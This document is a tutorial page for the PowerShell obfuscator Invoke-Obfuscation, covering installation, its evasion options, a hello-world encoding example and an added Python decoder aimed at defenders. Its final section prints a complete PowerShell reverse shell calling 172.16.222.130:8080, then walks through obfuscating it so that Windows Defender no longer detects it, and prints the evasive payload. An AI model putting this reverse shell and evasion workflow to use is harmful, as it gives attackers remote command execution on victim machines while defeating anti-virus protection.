Invoke-Obfuscation
Description
Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.
Installation
On Kali Linux, first install powershell:
$ sudo apt update && sudo apt install powershell
Then install Invoke-Obfuscation:
$ cd /data/src/
$ git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
$ cd Invoke-Obfuscation/
Start PowerShell and import the module:
$ pwsh
PS> Import-Module ./Invoke-Obfuscation.psd1
PS> Invoke-Obfuscation
Evasion techniques
TOKEN
Description: Obfuscate PowerShell command Tokens
- TOKEN\STRING: Obfuscate String tokens (suggested to run first)
- TOKEN\COMMAND: Obfuscate Command tokens
- TOKEN\ARGUMENT: Obfuscate Argument tokens
- TOKEN\MEMBER: Obfuscate Member tokens
- TOKEN\VARIABLE: Obfuscate Variable tokens
- TOKEN\TYPE: Obfuscate Type tokens
- TOKEN\COMMENT: Remove all Comment tokens
- TOKEN\WHITESPACE: Insert random Whitespace (suggested to run last)
- TOKEN\ALL: Select All choices from above (random order)
AST
Description: Obfuscate PowerShell Ast nodes (PS3.0+)
- AST\NamedAttributeArgumentAst: Obfuscate NamedAttributeArgumentAst nodes
- AST\ParamBlockAst: Obfuscate ParamBlockAst nodes
- AST\ScriptBlockAst: Obfuscate ScriptBlockAst nodes
- AST\AttributeAst: Obfuscate AttributeAst nodes
- AST\BinaryExpressionAst: Obfuscate BinaryExpressionAst nodes
- AST\HashtableAst: Obfuscate HashtableAst nodes
- AST\CommandAst: Obfuscate CommandAst nodes
- AST\AssignmentStatementAst: Obfuscate AssignmentStatementAst nodes
- AST\TypeExpressionAst: Obfuscate TypeExpressionAst nodes
- AST\TypeConstraintAst: Obfuscate TypeConstraintAst nodes
- AST\ALL: Select All choices from above
STRING
Description: Obfuscate entire command as a String
- STRING\1: Concatenate entire command
- STRING\2: Reorder entire command after concatenating
- STRING\3: Reverse entire command after concatenating
ENCODING
Description: Obfuscate entire command via Encoding
- ENCODING\1: Encode entire command as ASCII
- ENCODING\2: Encode entire command as Hex
- ENCODING\3: Encode entire command as Octal
- ENCODING\4: Encode entire command as Binary
- ENCODING\5: Encrypt entire command as SecureString (AES)
- ENCODING\6: Encode entire command as BXOR
- ENCODING\7: Encode entire command as Special Characters
- ENCODING\8: Encode entire command as Whitespace
COMPRESS
Description: Convert entire command to one-liner and Compress
- COMPRESS\1: Convert entire command to one-liner and compress
LAUNCHER
Description: Obfuscate command args w/Launcher techniques (run once at end)
- LAUNCHER\PS: PowerShell
- LAUNCHER\CMD: Cmd + PowerShell
- LAUNCHER\WMIC: Wmic + PowerShell
- LAUNCHER\RUNDLL: Rundll32 + PowerShell
- LAUNCHER\VAR+: Cmd + set Var && PowerShell iex Var
- LAUNCHER\STDIN+: Cmd + Echo | PowerShell - (stdin)
- LAUNCHER\CLIP+: Cmd + Echo | Clip && PowerShell iex clipboard
- LAUNCHER\VAR++: Cmd + set Var && Cmd && PowerShell iex Var
- LAUNCHER\STDIN++: Cmd + set Var && Cmd Echo | PowerShell - (stdin)
- LAUNCHER\CLIP++: Cmd + Echo | Clip && Cmd && PowerShell iex clipboard
- LAUNCHER\RUNDLL++: Cmd + set Var && Rundll32 && PowerShell iex Var
- LAUNCHER\MSHTA++: Cmd + set Var && Mshta && PowerShell iex Var
Usage
Basic example: display hello world
Let's start with a basic example: we'll obfuscate the command Write-Host 'Hello world' -ForegroundColor green. To do that, follow the steps below:
- Set the script block:
Invoke-Obfuscation> SET SCRIPTBLOCK Write-Host 'Hello world' -ForegroundColor green
- Choose one of the below evasion techniques (we'll choose ENCODING):
Invoke-Obfuscation> ENCODING
- Select the encoding type (we'll choose ASCII, which is the 1st option):
Invoke-Obfuscation\Encoding> 1
- Copy the output:
[STrIng]::joiN( , (( 87 , 114 ,105,116 ,101 ,45 , 72, 111,115, 116 , 32 ,39 ,72 ,101,108 ,108, 111 ,32, 119 ,111 , 114 , 108, 100 ,39 ,32 , 45 , 70, 111 , 114 ,101 ,103 , 114 ,111 ,117 , 110 , 100,67, 111, 108,111 ,114 , 32 ,103 ,114,101 , 101,110)|%{( [chaR][iNT] $_) }))| &( ([STRiNg]$vERbOsEPRefeReNCE)[1,3]+'X'-JoIN)
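As an added, defender-side example (not part of the original page or of the Invoke-Obfuscation project), the Python below decodes the ENCODING\1 output above back to its plaintext and resolves the command name that ([STRiNg]$vERbOsEPRefeReNCE)[1,3]+'X' spells out of the default value of $VerbosePreference. The sample input is the output shown above; the preference-variable defaults are those of a fresh PowerShell session, and the regexes are this example's own.

```python
import re

# Constructed sample: the ENCODING\1 output from the Hello-world walk-through above.
SAMPLE = (
    "[STrIng]::joiN( , (( 87 , 114 ,105,116 ,101 ,45 , 72, 111,115, 116 , 32 ,39 ,72 ,"
    "101,108 ,108, 111 ,32, 119 ,111 , 114 , 108, 100 ,39 ,32 , 45 , 70, 111 , 114 ,101 ,"
    "103 , 114 ,111 ,117 , 110 , 100,67, 111, 108,111 ,114 , 32 ,103 ,114,101 , 101,110)"
    "|%{( [chaR][iNT] $_) }))| &( ([STRiNg]$vERbOsEPRefeReNCE)[1,3]+'X'-JoIN)"
)

# Default values of common PowerShell preference variables in a fresh session; the
# obfuscator indexes into these strings to spell out "iex" without ever writing it.
PREFERENCE_DEFAULTS = {
    "verbosepreference": "SilentlyContinue",
    "debugpreference": "SilentlyContinue",
    "erroractionpreference": "Continue",
}

# A parenthesised run of eight or more small integers, e.g. "( 87 , 114 ,105, ...)".
CHAR_ARRAY_RE = re.compile(r"\(\s*(\d{1,3}(?:\s*,\s*\d{1,3}){7,})\s*\)")
# ([string]$SomePreference)[i,j]+'X': the fragment that rebuilds the command name.
PREF_ALIAS_RE = re.compile(
    r"\[string\]\s*\$(\w+)\s*\)\s*\[([\d,\s]+)\]\s*\+\s*'([^']+)'", re.IGNORECASE
)


def decode_char_arrays(script):
    """Decode every numeric array whose values are all printable ASCII."""
    decoded = []
    for m in CHAR_ARRAY_RE.finditer(script):
        codes = [int(n) for n in re.split(r"\s*,\s*", m.group(1))]
        if all(32 <= c < 127 for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def resolve_preference_alias(script):
    """Rebuild the command name spelled from a preference variable ('ieX' here),
    or None when the pattern or the variable is unknown."""
    m = PREF_ALIAS_RE.search(script)
    default = PREFERENCE_DEFAULTS.get(m.group(1).lower()) if m else None
    if default is None:
        return None
    picked = "".join(default[int(i)] for i in re.findall(r"\d+", m.group(2)))
    return picked + m.group(3)
```

A resolved alias that lower-cases to "iex" tells the analyst the decoded string is executed, not merely printed.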
Anti-Virus evasion example
Let's see how we can use a PowerShell-based reverse shell that will evade Windows Defender.
When we execute the following code in PowerShell, it is caught by the anti-virus:
$client = New-Object System.Net.Sockets.TCPClient('172.16.222.130',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Save the code as revshell.ps1.
- In Kali Linux, start PowerShell:
$ pwsh
- Import the module:
PS> Import-Module ./Invoke-Obfuscation.psd1
PS> Invoke-Obfuscation
- Import your script:
Invoke-Obfuscation> SET SCRIPTPATH /data/tmp/revshell.ps1
- Select an obfuscation method (we'll choose AST):
Invoke-Obfuscation> AST
- Select ALL:
Invoke-Obfuscation> ALL
- Select 1:
Invoke-Obfuscation> 1
Now, our payload is no longer caught by the anti-virus:
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient('172.16.222.130',8080));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable -Name sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()